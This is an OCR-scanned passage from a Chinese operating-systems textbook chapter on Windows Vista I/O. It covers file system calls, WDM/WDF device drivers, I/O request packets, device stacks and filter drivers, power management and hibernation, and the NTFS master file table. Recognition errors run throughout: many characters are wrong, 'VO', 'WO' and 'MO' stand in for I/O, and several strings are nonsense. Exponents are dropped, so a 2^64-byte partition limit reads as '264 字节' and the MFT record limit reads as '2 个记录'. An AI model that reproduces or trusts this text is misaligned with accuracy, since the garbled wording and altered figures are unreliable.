题 ， 因 为 那些 IO 操作 正在 等 待 。 因 此 ，Windows 提 供 了 取消 未 处 理 IO 
操作 的 功能 ， 其 中 包括 支持 文件 系统 强行 外 载 有 未 处 理 VO 操 作 的 卷 的 


功能 。 











NtQueryInformationFile 是 一 个 用 于 查询 目录 中 指定 文件 的 信息 的 系 
统 调用 。 还 有 一 个 与 它 相 对 应 的 系统 调用 : NtSetInformationFile。 这 些 
接口 用 于 访问 和 修改 文件 的 各 种 相关 信息 ， 如 文件 名 ， 类 似 于 加 密 、 压 
缩 、 稀 疏 等 文件 特征 ， 其 他 文件 属性 和 详细 资料 ， 包 括 查 询 内 部 文件 ID 
或 给 文件 分 配 一 个 唯一 的 二 进 制 名 称 〈 对 象 ID) 。 





这 些 系统 调用 本 质 上 是 特定 于 文件 的 ioctl 的 一 种 形式 。 这 组 操作 可 
以 用 来 重 命名 或 删除 一 个 文件 。 但 是 请 注意 ， 它 们 处 理 的 并 不 是 文件 
名 ， 所 以 要 重 命名 或 删除 一 个 文件 之 前 必须 先 打开 这 个 文件 。 它 们 也 可 
以 被 用 来 重新 命名 NTFS 上 的 交换 数据 流 《〈 见 11.8 节 ) 。 





存在 独立 的 API (NtLockFile 和 NtUnlockFile〉 用 来 设置 和 删除 文件 


中 字 节 域 的 锁 。 通 过 使 用 共享 模式 ，NtCreateFile 人 允许 访 问 被 限制 的 整个 
文件 。 男 一 种 是 这 些 锁 API， 它 们 用 来 强制 访问 文件 中 受 限 制 的 字 贡 
域 。 读 操作 和 写 操作 必须 提供 一 个 与 提供 给 NtLockFile 的 钥 是 相符 合 的 
密 钥 ， 以 便 操 作 被 锁定 的 区 域 。 


UNIX 中 也 有 类 似 的 功能 ， 但 在 UNIX 中 应 用 程序 可 以 自由 决定 是 否 
认同 这 个 区 域 锁 。NtFsControlFile 和 前 面 提 到 的 查询 和 设置 操作 很 相 
像 ， 但 它 是 一 个 则 在 处 理 特定 文件 的 操作 ， 其 他 的 API 并 不 适合 处 理 这 
种 文件 。 例 如 ， 有 些 操作 只 针对 特定 的 文件 系统 。 


最 后 ， 还 有 一 些 其 他 的 系统 调用 ， 比 如 NtFlushBuffersFile。 像 
UNIX 的 Sync 系统 调用 一 样 ， 它 强制 把 文件 系统 数据 写 回 到 磁盘 。 
NtCancelIoFile 用 于 取消 对 一 个 特定 文件 的 外 部 WO 请 求 ， 
NtDeviceIoControlFile 实 现 了 对 设备 的 ioctl 操 作 。 它 的 操作 清单 实际 上 比 
ioctl 更 长 。 有 一 些 系统 调用 用 于 按 文 件 名 删除 文件 ， 并 查询 特定 文件 的 
属性 一 一 但 这 些 操作 只 是 由 上 面 列 出 的 其 他 VO 管理 器 操作 包装 而 成 
的 。 在 这 里 ， 我 们 虽然 列 出 ， 但 并 不 是 真 的 要 把 它们 实现 成 独立 的 系统 
调用 。 还 有 一 些 用 于 处 理 MO 完 成 端口 的 系统 调用 ，Windows 的 队列 功能 
帮助 多 线程 服务 器 提高 使 用 异步 JO 操 作 的 效率 ， 主 要 通过 按 需 准 备 线 
程 并 降低 在 专用 线程 上 服务 VO 所 需要 的 上 下 文 切换 数目 来 实现 。 











11.7.3 IO 实现 


Windows IO 系统 由 即 揪 即 用 服务 、 电 源 管 理 器 、LIO 管 理 器 和 设备 
驱动 模型 组 成 。 即 插 即 用 服务 检测 硬件 配置 上 的 改变 并 且 为 每 个 设备 创 
建 或 拆伙 设 备 栈 ， 也 会 引起 设备 张 动 程序 的 装载 和 仓 载 。 功 耗 管理 器 会 
调节 IO 设备 的 功 耗 状 态 ， 以 在 设备 不 用 的 时 候 降低 系统 功 耗 。IO 管 理 
器 为 管理 JO 内 核对 象 以 及 如 IoCallDrivers 和 loCompleteRequest 等 基于 
IRP 的 操作 提供 支持 。 但 是 ， 支 持 Windows IO 所 需要 的 大 部 分 工作 都 由 
设备 驱动 程序 本 身 实现 。 


1. 设 备 驱 动 程序 


为 了 确保 设备 驱动 程序 能 和 Windows Vista 的 其 余部 分 协同 工作 ， 微 
软 公司 定义 了 设备 驱动 程序 需要 符合 的 WDM 〈Windows 驱 动 程序 模 
型 ) 。WDM 被 设计 成 能 在 windows 98 系 统 上 运行 ， 也 能 在 从 Windows 
2000 开 始 的 基于 NT 的 系统 上 运行 。WDM 人 允许 开发 人 员 编 写 与 两 类 系统 
都 兼容 的 驱动 程序 。 微 软 公司 还 提供 了 一 个 用 于 帮助 驱动 程序 开发 人 员 
编写 符合 模型 的 驱动 程序 的 开发 工具 箱 (Windows 驱 动 程序 开发 工具 
FD) 。 大 部 分 Windows 驱 动 程序 的 开发 过 程 都 是 先 复制 一 份 合 适 的 简单 
的 驱动 程序 ， 然 后 修改 它 。 




















微软 公司 也 提供 一 个 驱动 程序 验证 器 ， 用 以 验证 驱动 程序 的 多 个 行 


为 以 确保 驱动 程序 符合 Windows 驱 动 程序 模型 的 结构 要 求 和 IO 请 求 的 协 
议 要 求 、 内 存 管 理 等。 操作 系统 中 带 有 此 验证 需 ， 管 理 员 可 能 通过 运行 
verifier.exe 来 控制 驱动 程序 验证 器 ， 验 证 需 允许 管理 员 配 置 要 验证 哪些 
驱动 程序 以 及 在 怎样 的 范围 (多少 资源 ) 内 验证 这 些 驱 动 程序 。 

















即使 有 所 有 的 驱动 程序 开发 和 验证 支持 ， 在 Windows 中 写 一 个 简单 
的 驱动 程序 仍然 是 非常 困难 的 事情 ， 因 此 微软 建立 了 一 个 叫做 
WDF (Windows 驱 动 程 序 基 础 的 包装 系统 ， 它 运行 在 WDM 顶 层 ， 简 
化 了 很 多 更 普通 的 需求 ， 主 要 和 驱动 程序 与 电源 管理 和 即 插 即 用 操作 之 
间 的 正确 交互 有 关 。 











为 了 进一步 简化 编写 驱动 程序 ， 也 为 了 提高 了 系统 的 健壮 性 ， 
WDF 包 含 UMDF (用 户 模 式 驱动 程序 架构 ) ， 使 用 UMDEF 编 写 的 驱动 程 
序 作 为 在 进程 中 执行 的 服务 。 还 有 KMDF 〈 内 核 模 式 驱动 程序 架构 ) ， 
使 用 KMDF 编 写 的 驱动 程序 作为 在 内 核 中 执行 的 服务 ， 但 是 也 使 得 
WDM 中 的 很 多 细节 变 得 不 可 预料 。 由 于 底层 是 VDM， 并 且 WDM 提 供 
了 了 驱动 程序 模型 ， 因 此 ， 本 节 将 主要 关注 WDM。 








在 Windows 中 ， 设 备 是 由 设备 对 象 描 述 的 。 设 备 对 象 也 用 于 描述 硬 
件 〈“ 例 如 总 线 ) ， 软 件 抽象 (例如 文件 系统 、 网 络 协 议 ) ， 还 可 以 描述 
内 核 扩 展 “〈 例 如 病毒 过 滤器 驱动 程序 ) 。 上 面 提 到 的 这 些 设 备 对 象 都 是 
由 Windows 中 的 设备 栈 来 组 织 的 ， 见 前 面 的 图 11-16。 


IO 操作 从 IO 管理 器 调用 可 执行 API IoCallDriver 程 序 开始 ， 
IoCallDriver 市 有 指 同 顶层 设 备 对 象 和 描述 MO 请 求 的 IRP 的 指针 。 这 个 例 
程 可 以 找到 与 设备 对 象 联合 在 一 起 的 驱动 程序 。 在 IRP 中 指定 操作 类 型 
通常 都 符合 前 面 讲 过 的 VO 管理 器 系统 调用 ， 例 如 创建 、 读 取 和 关闭 。 


图 11-38 表 示 的 是 一 个 设备 栈 在 单独 一 层 上 的 关系 。 驱 动 程序 必须 
为 每 个 操作 指定 一 个 进入 点 。IoCallDriver 从 IRP 中 获取 操作 类 型 ， 利 用 
在 当前 级 别 的 设备 栈 中 的 设备 对 象 来 得 找 指 定 的 驱动 程序 对 象 ， 并 且 根 
据 操 作 类 型 索引 到 驱动 程序 分 派 表 去 但 找 相应 驱动 程序 的 进入 点 。 最 后 
会 把 设备 对 象 和 IRP 传 递 给 驱动 程序 并 调用 它 。 








设备 对 象 加 载 的 设备 驱动 程序 


驱动 程序 代码 





图 11-38 设备 栈 中 的 单独 一 层 








一 旦 驱动 程序 完成 处 理 IRP 描 述 的 请 求 后 ， 它 将 有 三 种 选择 。 第 
一 ， 驱动 程序 可 以 再 一 次 调用 IoCallDriver， 把 IRP 和 设备 栈 中 的 下 一 个 











设备 对 象 传递 给 相应 的 驱动 程序 。 第 二 ， 驱 动 程序 也 可 以 声明 W/O 请 求 
已 经 完成 并 返回 到 调用 者 。 第 三 ， 驱 动 程序 还 可 以 在 内 部 对 IRP 排 队 并 
返回 到 调用 者 ， 同 时 声明 IO 请 求 仍 未 处 理 。 后 一 种 情况 下 ， 如 果 栈 上 
的 所 有 驱动 都 认可 挂 起 行为 且 返 回 各 自 的 调用 者 ， 则 会 引起 一 次 异步 
IO 操作 。 








2.1/O 请 求 包 





图 11-39 表 示 的 是 IRP 中 的 主要 的 域 。IRP 的 底部 是 一 个 动态 大 小 的 
数组 ， 包 含 那些 被 设备 栈 管 理 请 求 的 域 ， 每 个 驱动 程序 都 可 以 使 用 这 些 
域 。 在 完成 一 次 MO 请 求 的 时 候 ， 这 些 设备 栈 的 域 也 允许 驱动 程序 指定 
要 调用 哪个 例 程 。 在 完成 请 求 的 过 程 中 ， 按 倒序 访问 设备 栈 的 每 一 级 ， 
并 且 依 次 调用 由 每 个 应 用 程序 指定 的 完成 例 程 。 在 每 一 级 ， 驱 动 程序 可 
以 继续 执行 以 完成 请 求 ， 也 可 以 因为 还 有 更 多 的 工作 要 做 从 而 决定 让 请 
求 处 于 未 处 理 状态 并 且 暂 停 WO 的 完成 。 
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内 存 描述 符 表 下 一 个 IRP 








内 存 描述 符 表 





完成 或 取消 信息 


完成 异步 过 PROD REFER 
程 调用 块 | 列 和 命令 














图 11-39 I/O 请 求 包 的 主要 域 





当 1O 管 理 费 分 配 一 个 IRP 时 ， 为 了 分 派 一 个 足够 大 的 I[RP， 它 必须 
知道 这 个 设备 栈 的 深度 。 在 建立 设备 栈 的 时 候 ，L/O 管 理 器 会 在 每 一 个 
设备 对 象 的 域 中 记录 栈 的 深度 。 注 意 ， 在 任何 栈 中 都 没有 正式 地 定义 下 
一 个 设备 对 象 是 什么 。 这 个 信息 被 保存 在 栈 中 当前 驱动 程序 的 私有 数据 
结构 中 。 事 实 上 这 个 栈 实际 上 并 不 一 定 是 一 个 真正 的 栈 。 在 每 一 层 栈 
中 ， 了 驱动 程序 都 可 以 自由 地 分 配 新 的 IRP， 或 者 继续 使 用 原来 的 IRP， 或 
者 发 送 一 个 IO 操作 给 另 一 个 设备 栈 ， 或 者 甚至 转换 到 一 个 系统 工作 线 
程 中 继续 执行 。 




















IRP 包 合 标 兰 位 、 索 引 到 张 动 程序 分 派 表 的 操作 码 、 指 同 凡 核 与 用 
户 缓冲 区 的 指针 和 一 个 MDL 《入 存 描述 符 列 表 ) 列表 。MDL 用 于 描述 





由 缓冲 区 描述 的 物理 内 存 框 ， 也 就 是 用 于 DMA 操 作 。 有 一 些 域 用 于 取 
消 和 完成 操作 。 当 WO 操作 已 经 完成 后 ， 在 处 理 IRP 时 用 于 排列 这 个 IRP 
到 设备 中 的 域 会 被 重用 。 目 的 是 给 用 于 在 原始 线程 的 上 下 文中 调用 1/O 
管理 器 的 完成 例 程 的 APC 控 制 对 象 提供 内 存 。 还 有 一 个 连接 域 用 于 连接 
所 有 的 外 部 IRP 到 初始 化 它们 的 线程 。 


3. 设 备 栈 (Device Stack) 





Windows Vista 中 的 驱动 程序 可 以 自己 完成 所 有 的 任务 ， 如 图 11-40 
所 示 的 打印 机 驱动 程序 。 男 一 方面 ， 驱 动 程序 也 可 以 堆 盖 起 来 ， 即 一 个 
请 求 可 以 在 一 组 驱动 程序 之 间 传 递 ， 每 个 驱动 程序 完成 一 部 分 工作 。 图 
11-40 也 给 出 了 两 个 堆 倒 的 驱动 程序 。 














用 户 进程 





Windows 的 其 余部 分 










图 11-40 Windows 允 许 驱 动 程序 堆肥 起 来 操作 设备 。 这 种 堆 屋 是 通过 
设备 对 象 (Device Object) 来 表示 的 


堆 合 驱动 程序 的 一 个 第 见 用 途 是 将 总 线 管理 与 控制 设备 的 功能 性 工 


作 分 离 。 因 为 要 考虑 多 种 模式 和 总 线 事务 ，PCI 总 线 上 的 总 线 管理 相当 
复杂 。 通 过 将 这 部 分 工作 与 特定 于 设备 的 部 分 分 离 ， 驱 动 程序 开发 人 员 
就 可 以 从 学 习 如 何 控 制 总 线 中 解脱 出 来 了 。 他 们 只 要 在 驱动 栈 中 使 用 标 
准 总 线 驱 动 程序 就 可 以 了 。 类 似 地 ，USB 和 SCSI 驱 动 程序 都 有 一 个 特定 
于 设备 的 部 分 和 一 个 通用 部 分 。Windows 为 其 中 的 通用 部 分 提供 了 公共 
的 驱动 程序 。 

















堆 登 设备 驱动 程序 的 另 一 个 用 途 是 将 过 滤器 驱动 程序 (filter 
driver) 插入 到 驱动 栈 中 。 我 们 已 经 讨论 过 文件 系统 过 滤器 驱动 程序 的 
使 用 了 ， 该 驱动 程序 插入 到 文件 系统 之 上 。 过 滤器 驱动 程序 也 用 于 管理 
物理 硬件 。 在 IRP 沿 着 设备 栈 (Device Stack) 向 下 传递 的 过 程 中 ， 以 及 
在 完成 操作 Ccompletion operation) 中 IRP 沿 着 设备 栈 中 各 个 设备 驱动 程 
序 指定 的 完成 例 程 (completion routine) 向 上 传递 的 过 程 中 ， 过 滤器 驱 
动 程序 会 对 所 要 进行 的 操作 进行 变换 。 例 如 ， 一 个 过 滤器 驱动 程序 能 够 
在 将 数据 存放 到 磁盘 上 时 对 数据 进行 压缩 ， 或 者 在 网 络 传输 前 对 数据 进 
行 加 密 。 将 过 滤器 放 在 这 里 意味 着 应 用 程序 和 真正 的 设备 驱动 程序 都 不 
必 知 道 过 滤器 的 存在 ， 而 过 滤器 会 自动 对 进出 设备 的 数据 进行 处 理 。 














内 核 态 设备 驱动 程序 是 影响 Windows 的 可 靠 性 和 稳定 性 的 严重 问 
题 。Windows 中 大 多 数 内 核 朋 温 都 是 由 设备 驱动 程序 出 错 造成 的 。 因 为 
内 核 态 设备 驱动 程序 与 内 核 及 执行 层 使 用 相同 的 地 址 空间 ， 驱 动 程序 中 
的 错误 可 能 破坏 内 核 数 据 结 构 ， 甚 全 更 糟 。 其 中 的 有 些 错误 之 所 以 产 








生 ， 部 分 原因 是 为 Windows 编 写 的 设备 驱动 程序 的 数量 极其 庞大 ， 部 分 
原因 是 设备 驱动 程序 由 缺乏 经 验 的 开发 者 编写 。 当然 ， 为 了 编写 一 个 正 
确 的 驱动 程序 而 涉及 的 大 量 设备 细节 也 是 造成 驱动 程序 错误 的 原因 。 











IO 模型 是 强大 而 且 灵 活 的 ， 但 是 几乎 所 有 的 IO 都 是 异步 的 ， 因 此 
系统 中 会 大 量 存在 竞 态 条 件 (race condition) 。 从 Win9x 系 统 到 基于 NT 
技术 的 Windows 系 统 ，Windows 2000 首 次 增加 了 即 插 即 用 (的 功能 ) 和 
电源 管理 设施 。 这 对 要 正确 地 操纵 在 处 理 MO 包 过 程 中 涉及 的 驱动 器 的 
驱动 程序 提出 了 很 多 要 求 。PC 机 用 户 常 常 插 上 / 拔 掉 设 备 ， 把 笔记 本 电 
脑 合 上 盖子 装 入 公文 包 ， 而 通常 不 考虑 设备 上 那个 小 绿灯 是 否 仍然 亮 着 
(表示 设备 正在 与 系统 交互 ) 。 编 写 在 这 样 的 环境 下 能 够 正确 运行 的 设 
备 驱 动 程序 是 非常 具有 挑战 性 的 ， 这 也 是 开发 WDF (Windows Driver 
Foundation〉 以 简化 Windows 驱 动 模型 的 原因 。 























电源 管理 器 集中 管理 整个 系统 的 电源 使 用 。 早 期 的 电源 管理 包括 关 
闭 显示 器 和 停止 磁盘 旋转 以 降低 电源 消耗 。 但 是 ， 我 们 需要 延长 笔记 本 
电脑 在 电池 供电 情况 下 的 使 用 时 间 。 我 们 还 会 涉及 长 时 间 无 人 看 管 运行 
的 桌面 计算 机 的 电源 节约 ， 以 及 节省 为 现今 存在 的 巨大 的 服务 似 群 提供 
能 源 的 昂贵 花费 〈 像 微软 、Google 这 样 的 公司 将 服务 问 群 建 在 水 电站 附 
近 以 降低 费用 ) 。 当 我 们 面临 以 上 问题 时 ， 和 情况 迅速 变 得 复杂 起 来 。 


更 新 一 些 的 电源 管理 设施 可 以 在 系统 没有 被 使 用 的 时 候 ， 通 过 切换 
设备 到 后 备 状态 甚至 通过 使 用 软 电 源 开关 (soft power switch) 将 设备 完 





全 关闭 来 降低 部 件 功 耗 。 在 多 处 理 右 中 ， 可 以 通过 关闭 不 需要 的 CPU 和 
降低 正在 运行 的 CPU 的 频率 来 减少 功 耗 。 当 一 个 处 理 器 空闲 的 时 候 ， 由 
于 除了 等 竺 中断 发 生 之 外 ， 该 处 理 器 不 需要 做 任何 事情 ， 它 的 功 耗 也 相 
应 减少 了 。 


Windows 文 持 一 种 特殊 的 关机 模 陈 一 一 休眠 ， 该 模式 将 物理 内 存 复 
制 到 磁盘 ， 然 后 把 电力 消耗 降低 到 很 低 的 水 平 (笔记本 电脑 在 休 虐 状态 
下 可 以 运行 几 个 星期 ， 电 池 的 消耗 也 变 得 十 分 缓慢 。 因 为 所 有 的 内 存 
状态 都 被 写 入 磁盘 ， 我 们 甚至 可 以 在 笔记 本 电脑 休眠 的 时 候 为 其 更 换 电 
池 。 从 休 虐 状态 重新 局 动 时 ， 系 统 恢 复 已 保存 的 内 存 状态 并 重新 初始 化 
设备 。 这 样 计 算 机 惑 恢复 到 休眠 之 前 的 状态 ， 而 不 需要 重新 登录 ， 也 不 
必 重 新 启动 所 有 休眠 前 正在 运行 的 应 用 程序 和 服务 。 尺 管 Windows 设 法 
优化 这 个 过 程 〈 包 括 忽略 在 磁盘 中 已 备份 而 在 内 存 中 未 被 修改 的 页 面 及 
压缩 其 他 内 存 页 面 以 减少 对 VO 操作 的 需求 ) ， 对 于 一 个 有 几 个 GB 内 存 
的 笔记 本 电脑 或 果 面 机 来 说 ， 仍 然 十 要 花费 数秒 钟 的 时 间 来 进入 休 虐 状 
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的 功率 状态 ， 仅 使 用 足够 RAM 刷 新 的 功率 。 因 为 不 需要 将 内 存 复制 到 
磁盘 ， 进 入 待机 状态 比 进入 休眠 状态 的 速度 更 快 。 但 是 待机 状态 不 像 休 
眠 状态 那么 可 靠 。 因 为 如 果 在 待机 状态 遇 到 梨 面 机 兵 电 ， 笔 记 本 电脑 更 
换 电池 ， 或 者 由 于 驱动 程序 故障 使 得 设备 切换 到 低 功 耗 状态 后 无 法 重新 














初始 化 等 情况 ， 系 统 将 无 法 恢复 到 符 机 前 的 状态 。 在 开发 Windows Vista 
的 过 程 中 ， 微 软 和 很 多 硬件 设备 厂商 合作 ， 论 费 了 极 大 的 努力 改进 得 机 
模式 的 操作 。 他 们 也 终止 了 人 允许 应 用 软件 酚 止 系统 进入 待机 模式 这 一 习 
惯 有 时 芷 忽 的 用 户 没有 等 到 指示 灯 烛 灭 就 把 笔记 本 电脑 放 进 公文 包 ， 
从 而 导致 笔记 本 电脑 过 热 ) 。 


有 很 多 关于 WDM (Windows Driver Model) 和 WDF (Windows 
Driver Foundation) 的 有 用 的 书 (Cant，2005; Oney, 2002; Orwick& 
Smith, 2007; Viscarola 等 人 ，2007) 。 


11.8 Windows NT 文件 系统 


Windows Vista 文 持 在 干 种 文件 系统 ， 其 中 最 重要 的 是 FAT-16、 
FAT-32 和 NTFS (NT 文件 系统 ) 。FAT-16 是 MS-DOS 文 件 系统 ， 它 使 用 
16 位 磁盘 地 址 ， 这 就 限制 了 它 使 用 的 磁盘 分 区 不 能 大 于 2GB。 现 在 ， 这 
种 文件 系统 基本 上 仅 用 来 访问 软盘 。FAT-32 使 用 32 位 磁盘 地 址 ， 最 大 
文 持 2TB 的 磁盘 分 区 。FAT32 没 有 任何 安全 措施 ， 现 在 我 们 只 在 可 移动 
介质 《如 闪存) 中 使 用 它 。NTFS 是 一 个 专门 为 Windows NT 开发 的 文件 
系统 。 从 Windows XP 开始 ， 计 算 机 三 商 把 它 作 为 默认 安装 的 文件 系 
统 ， 这 极 大 地 提升 了 Windows 的 安全 性 和 功能 。NTFS 使 用 64 位 磁盘 地 
HFH HEWWE) 能 够 支持 最 大 264 字 节 的 磁盘 分 区 ， 尽 管 还 有 其 他 因 
素 会 限制 磁盘 分 区 大 小 。 








因为 NTFS 文 件 系 统 是 一 个 带 有 很 多 有 趣 的 特性 和 创新 设计 的 现代 
文件 系统 ， 在 本 章 中 我 们 将 针对 NTFS 文 件 系 统 进行 讨论 。NTFS 是 一 个 
大 而 且 复 杂 的 文件 系统 ， 由 于 篇 幅 所 限 ， 我 们 不 能 讨论 其 所 有 的 特性 ， 
但 是 接 下 来 的 内 容 会 使 读者 对 它 印象 深刻 。 


11.8.1 基本 概念 


NTEFS 限 制 每 个 独立 的 文件 名 最 多 由 255 个 字符 组 成 ; 全 路 径 名 最 多 


有 32 767 个 字符 。 文 件 名 采用 Unicode 编 码 ， 人 允许 非 拉 丁 语系 国家 的 用 户 
《如 和 希腊、 日 本 、 印 度 、 俄 罗斯 和 以 色 列 ) 用 他 们 的 母语 为 文件 命名 。 
例如 ，yts 就 是 一 个 完全 合法 的 文件 名 。NTES 完 全 支持 区 分 大 小 写 的 

文件 名 《所 以 foo 与 Foo 和 FOO 是 不 同 的 ) 。Win32 API 不 完全 文 持 区 分 
大 小 写 的 文件 名 ， 并 且 根 本 不 支持 区 分 大 小 写 的 目录 名 。 为 了 保持 与 

UNIX 系 统 的 兼容 ， 当 运行 POSIX 子 系统 时 ，Windows 提 供 区 分 大 小 写 

的 支持 。Win32 不 区 分 大 小 写 ， 但 是 它 保持 大 小 写 状态 ， 所 以 文件 名 可 
以 包含 大 写字 母 和 小 写字 母 。 尽 管区 分 大 小 写 是 一 个 UNIX 用 户 非 常熟 
悉 的 特性 ， 但 是 对 一 般 用 户 而 言 ， 这 是 很 不 方便 的 。 例 如 ， 现 在 的 互联 
网 在 很 大 程度 上 是 不 区 分 大 小 写 的 。 














与 FAT32 和 UNIX 文 件 不 同 ，NTFS 文 件 并 不 只 是 字 节 的 一 个 线性 序 
列 ， 而 是 一 个 文件 由 很 多 属性 组 成 ， 每 个 属性 由 一 个 字 节 流 表示 。 大 部 
分 文件 都 包含 一 些 短 字 节 流 《〈 如 文件 名 和 64 位 的 对 象 ID) ， 和 一 个 包含 
数据 的 未 命名 的 长 字 节 流 。 当 然 ， 一 个 文件 也 可 以 有 两 个 或 多 个 数据 流 
( 即 长 字 节 流 ) 。 每 个 流 有 一 个 由 文件 名 、 一 个 冒号 和 一 个 流 名 组 成 的 
名 字 ， 例 如 ，foo:stream1。 每 个 流 有 自己 的 大 小 ， 并 且 相 对 于 所 有 其 他 
的 流 都 是 可 以 独立 锁定 的 。 一 个 文件 中 存在 多 个 流 的 想法 在 NTFS 中 并 
不 新 鲜 。 苹 果 Macintosh 的 文件 系统 为 每 个 文件 使 用 两 个 流 ， 一 个 数据 
TX (data fork) 和 一 个 资源 分 支 〈resource fork) 。NTFS 中 多 数据 流 
的 首次 使 用 是 为 了 允许 一 个 NT 文件 服务 器 为 Macintosh 用 户 提供 服务 。 
多 数据 流 也 用 于 表示 文件 的 元 数据 ， 例 如 Windows GUI 中 使 用 的 JPEG 图 





像 的 缩 略 图 。 但 是 ， 多 数据 流 很 脆弱 ， 并 且 在 传输 文件 到 其 他 文件 系 
统 ， 通 过 网 络 传输 文件 甚至 在 文件 备份 和 后 来 恢复 的 过 程 中 都 会 丢失 文 
件 。 这 是 因为 很 多 工具 都 忽略 了 它们 。 








与 UNIX 文 件 系 统 类 似 ，NTEFS 是 一 个 层次 化 的 文件 系统 。 名 字 的 各 
部 分 之 间 用 “分隔 ， 而 不 是 “%*”， 这 是 从 MS-DOS 时 代 与 CP/M 相 兼容 的 
需求 中 继承 下 来 的 。 与 UNIX 中 当前 工作 目录 的 概念 不 同 的 是 ， 作 为 文 
件 系统 设计 的 一 个 基础 部 分 的 链接 到 当前 目录 O 和 父 目 录 C.) 的 硬 
连接 ， 在 Windows 是 作为 一 种 惯例 来 是 实现 的 。 系 统 仅 在 其 中 的 POSIX 
子 系统 里 文 持 硬 连接 ， 正 因为 这 样 ，NTEFS 文 持 对 目录 的 遍历 检查 
CUNIX 中 的 “x” 权 限 〉。 








从 Windows Vista 开 始 ，NTFS 才 开始 文 持 符号 链接 。 为 了 避免 如 
Spoofing 这 样 的 安全 问题 (当年 在 UNIX 4.2BSD 第 一 次 引入 符号 链接 时 
WLI BI) ， 通 常 只 允许 系统 管理 员 来 创建 符号 链接 。 在 Vista 中 符号 链 
接 的 实现 用 到 一 个 叫 再 解析 点 (reparse points) 的 NTFS 特 性 《将 在 本 节 
后 续 部 分 讨论 ) 。 另 外 ，NTFS 也 文 持 压缩 、 加 密 、 容 错 、 日 志和 黎 路 
文件 。 我 们 马上 就 会 探讨 这 些 特性 及 其 实现 。 


11.8.2 NTEFS 文 件 系统 的 实现 


NTFS 文 件 系统 是 专门 为 NT 系统 开发 的 ， 用 来 伏 代 OS/2 中 的 HPFS 
文件 系统 的 。 它 是 一 个 具有 很 高 复杂 性 和 精密 性 的 文件 系统 。NT 系 统 
的 大 部 分 是 在 陆地 上 设计 的 。 从 这 方面 看 ，NTFS 与 NT 系统 其 他 部 分 相 
比 是 独一无二 的 ， 因 为 它 的 很 多 最 初 设计 都 是 在 一 舟 驶 出 普 吉 特 湾 的 帆 
船 的 甲板 上 完成 的 (严格 遵守 上 午 工 作 ， 下 午 喝 啤酒 的 作息 协议 )。 





接 下 来 ， 我 们 将 从 NTFS 结 构 开 始 ， 探 讨 一 系列 NTFS 特 性 ， 包 括 文 
件 名 查找 、 文 件 压 缩 、 日 志和 加 密 。 


1. 文 件 系 统 结构 


每 个 NTFS 卷 (如 磁盘 分 区 〉 都 包含 文件 、 目 录 、 位 图 和 其 他 数据 
结构 。 每 个 卷 被 组 织 成 磁盘 块 的 一 个 线形 序列 (在 微软 的 术语 中 
UAR ， 每 个 卷 中 块 的 大 小 是 固定 的 。 根 据 卷 的 大 小 不 同 ， 块 的 大 小 
从 512 字 节 到 64KB 不 等 。 大 多 数 NTFS 磁 盘 使 用 4KB 的 块 ， 作 为 有 利于 
高 效 传输 的 大 块 和 有 利于 减少 内 部 碎片 的 小 块 之 间 的 折 中 办 法 。 每 个 块 
用 其 相对 于 卷 起 始 位 置 的 64 位 偏 移 量 来 指示 。 








每 个 卷 中 的 主要 数据 结构 叫 MFT ( 主 文件 表 ，Master File Table) , 
该 表 是 以 1KB 为 固定 大 小 的 记录 的 线形 序列 。 每 个 MFT 记 录 描 述 一 个 文 





件 或 目录 。 它 包含 了 如 文件 名 、 时 间 戳 、 文 件 中 的 块 在 磁盘 上 的 地 址 的 
列表 等 文件 属性 。 如 果 一 个 文件 非常 大 ， 有 时 候 会 需要 两 个 或 更 多 的 

MEFT 记 录 来 保存 所 有 块 的 地 址 列表 。 这 时 ， 第 一 个 MEFT 记 录 叫 做 基本 记 
2k (base record) ， 该 记录 指向 其 他 的 MFT 记 录 。 这 种 淤 出 方案 可 以 退 
溯 到 CP/M， 那 时 每 个 目录 项 称 为 一 个 范围 Cextent) 。 用 一 个 位 图 记录 
哪个 MFT 表 项 是 空闲 的 。 








MEFT 本 身 就 是 一 个 文件 ， 可 以 和 被 放 在 卷 中 的 任何 位 置 ， 这 样 就 避免 
了 在 第 一 磁道 上 出 现 错误 局 区 引起 的 问题 。 而 且 MFT 可 以 根据 需要 变 
大 ， 最 大 可 以 有 2 个 记录 。 








图 11-41 是 一 个 MFT。 每 个 MFT 记 录 由 数据 对 (属性 头 ， 值 的 一 
个 序列 组 成 。 每 个 属性 由 一 个 说 明了 该 属性 是 什么 和 属性 值 有 多 长 的 头 
开始 。 一 些 属性 值 是 变 长 的 ， 如 文件 名 和 数据 。 如 果 属 性 值 足 够 短 能 够 
放 到 MFT 记 录 中 ， 那 么 就 把 它 放 到 记录 里 。 这 叫做 直接 文件 
(immediate file，[Mullender and Tanenbaum，1984]) 。 如 果 属 性 值 太 
长 ， 它 将 被 放 在 磁盘 的 其 他 位 置 ， 并 在 MFT 记 录 里 存放 一 个 指向 它 的 指 
针 。 这 使 得 NTFS 对 于 小 的 域 〈 即 那些 能 够 放 入 MFT 记 录 中 的 域 ， 非 常 
有 效率 。 
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图 11-41 NTFS 主 文件 表 


最 开始 的 16 个 MFT 记 录 为 NTFS 元 数据 文件 而 预 留 ， 如 图 11-41 所 


每 一 个 记录 描述 了 一 个 正常 的 具有 属性 和 数据 块 的 文件 ， 就 如 同 其 





他 文件 一 样 。 这 些 文件 中 每 一 个 都 由 “$” 开 始 表 明 它 是 一 个 元 数据 文 


件 。 第 一 个 记录 描述 了 MEFT 文 件 本 身 。 它 说 明了 MFT 文 件 的 块 都 放 在 哪 
里 以 确保 系统 能 找到 MFT 文 件 。 很 明显 ，Windows 需 要 一 个 方法 找到 
MFT 文 件 中 第 一 个 块 ， 以 便 找到 其 余 的 文件 系统 信息 。 找 到 MFT 文 件 中 
第 一 个 块 的 方法 是 查看 启动 块 ， 那 是 卷 被 格式 化 为 文件 系统 时 地 址 所 存 
放 的 位 置 。 








记录 1 是 MFT 文 件 早期 部 分 的 复制 。 这 部 分 信息 非常 重要 ， 因 此 拥 
有 第 二 份 找 贝 至 关 重 要 以 防 MFT 的 第 一 块 坏 掉 。 记 录 2 是 一 个 Log 文 件 。 
当 对 文件 系统 做 结构 性 的 改变 时 ， 例 如 ， 增 加 一 个 新 目录 或 删除 一 个 现 
有 上 目录， 动作 在 执行 前 就 记录 在 Log 里 ， 从 而 增加 在 这 个 动作 执行 时 出 
fae CEM RAR STO 被 正确 恢复 的 机 会 。 对 文件 属性 做 的 改变 也 
会 记录 在 这 里 。 事 实 上 ， 唯 一 不 会 记录 的 改变 是 对 用 户 数 据 的 改变 。 记 
